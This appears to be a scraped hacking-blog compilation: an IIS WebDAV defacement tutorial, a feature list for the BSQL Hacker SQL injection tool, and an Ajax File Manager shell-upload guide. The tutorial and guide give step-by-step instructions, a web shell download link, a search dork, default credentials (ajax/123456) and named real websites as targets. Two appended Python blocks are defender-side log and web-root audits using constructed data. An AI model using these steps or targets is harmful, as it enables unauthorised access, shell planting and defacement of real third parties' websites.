How to Hack IIS Exploit Websites: The Easiest Way of Website Hacking
Now a folder named “Web Folders” will open.
STEP 3: Now right-click in the folder, go to “New” and then “Web Folder”.
How to Hack IIS Exploit in Windows 7 : Detailed Tutorial with homepage hacking
IIS Exploit Website Hacking in Windows 7, Explained Step by Step with Images
Step 1: Go to My Computer, right-click and select "Add a network location".
Step 2: Click Next.
Step 3: Click Next.
Step 4: Enter the URL of the vulnerable website and click Next. For example, take this site: http://www.myxixia.com/
Step 5: Click the Next button.
Step 6: Click Finish.
Step 7: Look under the Network Location section and click on the website folder.
Step 8: Download the shell: http://www.ziddu.com/download/16498227/shell.zip.html
Step 9: After downloading, right-click the file and click "Extract here".
Step 10: Copy the Power.asp;.jpg file and open the web folder of the vulnerable website.
Step 11: Paste the power.asp;.jpg file into the web folder.
Step 12: Paste complete.
Step 12: Open your browser and enter the site address with Power.asp;.jpg after the URL, for example http://www.myxixia.com/power.asp;.jpg
Step 13: Click on edit file index.asp.
Step 14: Open your deface HTML file: right-click it and select "Open with" Notepad.
Step 15: Copy all the code.
Step 16: Paste all the code into the popup you got after clicking edit index.asp, and click Save.
Step 17: You will now get a page like this.
Step 18: You're done 🙂 Now when you open that website you will get your deface page on the home page 🙂
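Added example, not part of the original tutorial: a defender-side scan of IIS W3C logs for the two traces the steps above leave behind, a WebDAV write that succeeded without authentication and a request path where a script extension is followed by a semicolon (as in power.asp;.jpg). The log lines are constructed sample data, and the logged field set is an assumption about the server's logging configuration.

```python
import re

# Constructed sample in IIS W3C extended log format (not from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2011-01-05 10:00:01 GET /index.asp - 198.51.100.7 200
2011-01-05 10:02:13 PROPFIND / - 203.0.113.9 207
2011-01-05 10:02:40 PUT /Power.asp;.jpg - 203.0.113.9 201
2011-01-05 10:03:02 GET /power.asp;.jpg - 203.0.113.9 200
2011-01-05 10:05:44 PUT /docs/report.doc CORP\\alice 192.0.2.20 201
2011-01-05 10:06:10 PUT /img/logo.jpg - 203.0.113.9 403
"""

# WebDAV methods that create or change content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "PROPPATCH", "DELETE"}
# Script extension followed by ';' in the last path segment.
SCRIPT_SEMICOLON = re.compile(r"\.(asp|asa|cer|cdx|aspx);[^/]*$", re.I)

def scan(log_text):
    """Return (line_no, client_ip, method, uri, reasons) for suspicious entries."""
    fields, findings = [], []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for following rows
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):          # malformed row, skip it
            continue
        rec = dict(zip(fields, parts))
        reasons = []
        succeeded = rec.get("sc-status", "").startswith("2")
        anonymous = rec.get("cs-username", "-") == "-"
        if rec.get("cs-method", "").upper() in WRITE_METHODS and succeeded and anonymous:
            reasons.append("anonymous WebDAV write succeeded")
        if SCRIPT_SEMICOLON.search(rec.get("cs-uri-stem", "")):
            reasons.append("script extension followed by ';'")
        if reasons:
            findings.append((line_no, rec.get("c-ip"), rec.get("cs-method"),
                             rec.get("cs-uri-stem"), reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any hit on the first rule means the site accepts unauthenticated WebDAV writes; disabling WebDAV or removing anonymous write permission on the web root closes the path the tutorial relies on.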
BSQL Hacker : automated SQL Injection Framework Tool
BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities in virtually any database.
BSQL Hacker is aimed at experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).
New version is out, it’s mostly bug fixes :
http://labs.portcullis.co.uk/application/deep-blind-sql-injection/
Key Features
- Easy Mode
  - SQL Injection Wizard
  - Automated Attack Support (database dump)
    - ORACLE
    - MSSQL
    - MySQL (experimental)
- General
  - Fast and Multithreaded
  - 4 Different SQL Injection Support
    - Blind SQL Injection
    - Time Based Blind SQL Injection
    - Deep Blind (based on advanced time delays) SQL Injection
    - Error Based SQL Injection
  - Can automate most of the new SQL Injection methods that rely on Blind SQL Injection
  - RegEx Signature support
  - Console and GUI Support
  - Load / Save Support
  - Token / Nonce / ViewState etc. Support
  - Session Sharing Support
  - Advanced Configuration Support
  - Automated Attack mode, Automatically extract all database schema and data mode
- Update / Exploit Repository Features
  - Metasploit-like exploit repository support
  - Allows saving and sharing SQL Injection exploits
  - Supports auto-update
  - Custom GUI support for exploits (cookie input, URL input etc.)
- GUI Features
  - Load and Save
  - Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be shown to the user in a GUI)
  - Visually view true and false responses as well as full HTML response, including time and stats
- Connection Related
  - Proxy Support (Authenticated Proxy Support)
  - NTLM, Basic Auth Support, use default credentials of current user/application
  - SSL (also invalid certificates) Support
  - Custom Header Support
- Injection Points (only one of them or combination)
  - Query String
  - Post
  - HTTP Headers
  - Cookies
- Other
  - Post Injection data can be stored in a separate file
  - XML Output (not stable)
  - CSRF protection support (one-time session tokens, ASP.NET ViewState or similar can be used for separate login sessions, bypassing proxy pages etc.)
Ajax File Manager ~ Shell and Files Upload Vulnerability

Open the Google search engine and type this dork: inurl:/plugins/ajaxfilemanager/
For example, I got:
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
or any other site …
Now put ajaxfilemanager/ajaxfilemanager.php after /plugins/ in the URL.
For example:
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
Now find the Upload option and upload your shell/deface/file.
To view your file, find the /uploaded/ directory on the website by using your brain 😛
Example of an uploaded file: http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt
Some demo sites:
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
Results :
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
If you need to log in to any ajaxfilemanager:
Default password for Ajax File Manager
Username: ajax
Password: 123456
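Added example, not part of the original post: a site owner's audit of a web root for the three conditions this section depends on, a reachable ajaxfilemanager.php, the default ajax / 123456 credentials still present in the plugin's PHP files, and script files sitting in an uploaded/ directory. The sample tree is constructed, and its config file name and PHP constant names are hypothetical, so the check matches the credential literals rather than a specific config key.

```python
import os
import re
import tempfile

# Extensions a web server may execute, also when another extension follows.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx|jsp|cgi|pl)(\W|$)", re.I)
DEFAULT_USER = re.compile(r"""['"]ajax['"]""")      # default username from the page
DEFAULT_PASS = re.compile(r"""['"]123456['"]""")    # default password from the page

def audit(webroot):
    """Return sorted (finding, relative path) pairs for a web root."""
    findings = []
    for dirpath, _, filenames in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
        parts = rel_dir.split("/")
        for name in filenames:
            rel = f"{rel_dir}/{name}"
            if "uploaded" in parts:
                if SCRIPT_EXT.search(name):
                    findings.append(("script-in-upload-dir", rel))
            elif "ajaxfilemanager" in parts and name.endswith(".php"):
                if name == "ajaxfilemanager.php":
                    findings.append(("plugin-present", rel))
                with open(os.path.join(dirpath, name), errors="ignore") as fh:
                    text = fh.read()
                if DEFAULT_USER.search(text) and DEFAULT_PASS.search(text):
                    findings.append(("default-credentials", rel))
    return sorted(findings)

def build_sample_tree():
    """Constructed web root for the demo; file names and constants are hypothetical."""
    root = tempfile.mkdtemp()
    files = {
        "plugins/ajaxfilemanager/ajaxfilemanager.php": "<?php /* entry point */",
        "plugins/ajaxfilemanager/inc/config.php":
            "<?php define('LOGIN_USER', 'ajax'); define('LOGIN_PASS', '123456');",
        "plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt": "test",
        "plugins/ajaxfilemanager/uploaded/shell.php.jpg": "<?php /* dropped script */",
        "images/uploaded/logo.png": "png",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for finding in audit(build_sample_tree()):
        print(*finding)
```

A plugin-present finding on a public site is reason enough to remove the plugin or put it behind authentication; the other two findings indicate it may already have been used.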